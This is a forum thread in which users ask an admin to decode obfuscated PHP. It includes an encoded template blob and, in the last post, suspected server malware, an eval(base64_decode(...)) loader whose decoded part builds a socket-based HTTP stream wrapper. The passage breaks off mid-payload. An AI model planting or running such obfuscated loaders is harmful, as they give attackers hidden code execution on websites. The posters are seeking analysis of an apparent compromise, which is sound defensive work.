[idllc]

We have tried every method mentioned and tried the tools you posted to no avail. Can you tell me if this can be undone? Thanks in advance

PHP Code:

Thank you! 


and

PHP Code:

Thank you! 


[Admin]

Quote:

Originally Posted by idllc

We have tried every method mentioned and tried the tools you posted to no avail. Can you tell me if this can be undone? Thanks in advance

Decoded and sent via PM.

[yesdownloads]

I also have a encoded file, which will not decode using this script. Could somebody decode it for me? Thank you in advance!


the code and very large..I put the code to download at my Website

http://clickgratis.org/encoded.rar

please, help me

[Admin]

Here it is, just rename as .php

[lolaness]

Please help ... I'm assuming this was double-encoded because everything I've tried results in ... gibberish. I just really, really need to change things so that categories don't display in the footer.

Thank you in advance.

<? eval(gzinflate(str_rot13(base64_decode('FZfHroZAZV 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')))); ?>

[CVM]

Hi We received this code on our server, possible hacker. The file is decoded and I've tried all the options above. Any chance you can have go at decoding this file so we can find the root cause?

Code:

<?php error_reporting(0);$p="bagcfzzazbzbczfgizc";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnByb3RlY3RlZCAkZnVsbHVybDsgcHJvdGVjdGVkICRwX3VybDsgcHJvdGVjdGVkICRjb25uX2lkOyBwcm90ZWN0ZWQgJGZsdXNoZWQ7IHByb3RlY3RlZCAkbW9kZSA9IDQ7IHByb3RlY3RlZCAkZGVmbW9kZTsgcHJvdGVjdGVkICRyZWRpcmVjdHMgPSAwOyBwcm90ZWN0ZWQgJGJpbmFyeTsgcHJvdGVjdGVkICRvcHRpb25zOyBwcm90ZWN0ZWQgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KcHJvdGVjdGVkIGZ1bmN0aW9uIGVycm9yKCRtc2c9J25vdCBjb25uZWN0ZWQnKSB7IGlmICgkdGhpcy0+b3B0aW9ucyAmIFNUUkVBTV9SRVBPUlRfRVJST1JTKSB7IHRyaWdnZXJfZXJyb3IoJG1zZywgRV9VU0VSX1dBUk5JTkcpOyB9IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9vcGVuKCRwYXRoLCAkbW9kZSwgJG9wdGlvbnMsICRvcGVuZWRfcGF0aCkgeyAkdGhpcy0+ZnVsbHVybCA9ICRwYXRoOyAkdGhpcy0+b3B0aW9ucyA9ICRvcHRpb25zOyAkdGhpcy0+ZGVmbW9kZSA9ICRtb2RlOyAkdXJsID0gcGFyc2VfdXJsKCRwYXRoKTsgaWYgKGVtcHR5KCR1cmxbJ2hvc3QnXSkpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignbWlzc2luZyBob3N0IG5hbWUnKTsgfSAkdGhpcy0+Y29ubl9pZCA9IGZzb2Nrb3BlbigkdXJsWydob3N0J10sIChlbXB0eSgkdXJsWydwb3J0J10pID8gODAgOiBpbnR2YWwoJHVybFsncG9ydCddKSksICRlcnJubywgJGVycnN0ciwgMik7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChlbXB0eSgkdXJsWydwYXRoJ10pKSB7ICR1cmxbJ3BhdGgnXSA9ICcvJzsgfSAkdGhpcy0+cF91cmwgPSAkdXJsOyAkdGhpcy0+Zmx1c2hlZCA9IGZhbHNlOyBpZiAoJG1vZGVbMF0gIT0gJ3InIHx8IChzdHJwb3MoJG1vZGUsICcrJykgIT09IGZhbHNlKSkgeyAkdGhpcy0+bW9kZSArPSAyOyB9ICR0aGlzLT5iaW5hcnkgPSAoc3RycG9zKCRtb2RlLCAnYicpICE9PSBmYWxzZSk7ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgaWYgKCFpc3NldCgkY1snbWV0aG9kJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21ldGhvZCcsICdHRVQnKTsgfSBpZiAoIWlzc2V0KCRjWydoZWFkZXInXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnaGVhZGVyJywgJycpOyB9IGlmICghaXNzZXQoJGNbJ3VzZXJfYWdlbnQnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAndXNlcl9hZ2VudCcsIGluaV9nZXQoJ3VzZXJfYWdlbnQnKSk7IH0gaWYgKCFpc3NldCgkY1snY29udGVudCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdjb250ZW50JywgJycpOyB9IGlmICghaXNzZXQoJGNbJ21heF9yZWRpcmVjdHMnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWF4X3JlZGlyZWN0cycsIDUpOyB9IHJldHVybiB0cnVlOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fcmVhZCgkYnl0ZXMpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+Zmx1c2hlZCAmJiAhJHRoaXMtPnN0cmVhbV9mbHVzaCgpKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZmVvZigkdGhpcy0+Y29ubl9pZCkpIHsgcmV0dXJuICcnOyB9ICRieXRlcyA9IG1heCgxLCRieXRlcyk7IGlmICgkdGhpcy0+YmluYXJ5KSB7IHJldHVybiBmcmVhZCgkdGhpcy0+Y29ubl9pZCwgJGJ5dGVzKTsgfSBlbHNlIHsgcmV0dXJuIGZnZXRzKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fd3JpdGUoJGRhdGEpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+bW9kZSAmIDIpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignU3RyZWFtIGlzIGluIHJlYWQtb25seSBtb2RlJyk7IH0gJGMgPSAkdGhpcy0+Y29udGV4dCgpOyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAoKCR0aGlzLT5kZWZtb2RlWzBdID09ICd4JykgPyAnUFVUJyA6ICdQT1NUJykpOyBpZiAoc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICRjWydjb250ZW50J10uJGRhdGEpKSB7IHJldHVybiBzdHJsZW4oJGRhdGEpOyB9IHJldHVybiAwOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc2Vlaygkb2Zmc2V0LCAkd2hlbmNlKSB7IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV90ZWxsKCkgeyByZXR1cm4gMDsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RyaXBvcygkZGF0YSwgJ0xvY2F0aW9uOiAnKSAhPT0gZmFsc2UpIHsgJG5ld19sb2NhdGlvbiA9IHRyaW0oc3RyX2lyZXBsYWNlKCdMb2NhdGlvbjogJywgJycsICRkYXRhKSk7IGJyZWFrOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB9IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLic6ICcuJG5ld19sb2NhdGlvbiwgRV9VU0VSX05PVElDRSk7ICR0aGlzLT5zdHJlYW1fY2xvc2UoKTsgcmV0dXJuICgkY1snbWF4X3JlZGlyZWN0cyddID4gJHRoaXMtPnJlZGlyZWN0cysrICYmICR0aGlzLT5zdHJlYW1fb3BlbigkbmV3X2xvY2F0aW9uLCAkdGhpcy0+ZGVmbW9kZSwgJHRoaXMtPm9wdGlvbnMsIG51bGwpICYmICR0aGlzLT5zdHJlYW1fZmx1c2goKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyAkaHR0cF9yZXNwb25zZV9oZWFkZXIgLj0gJGRhdGEuIlxyXG4iOyBpZiAoc3RyaXBvcygkZGF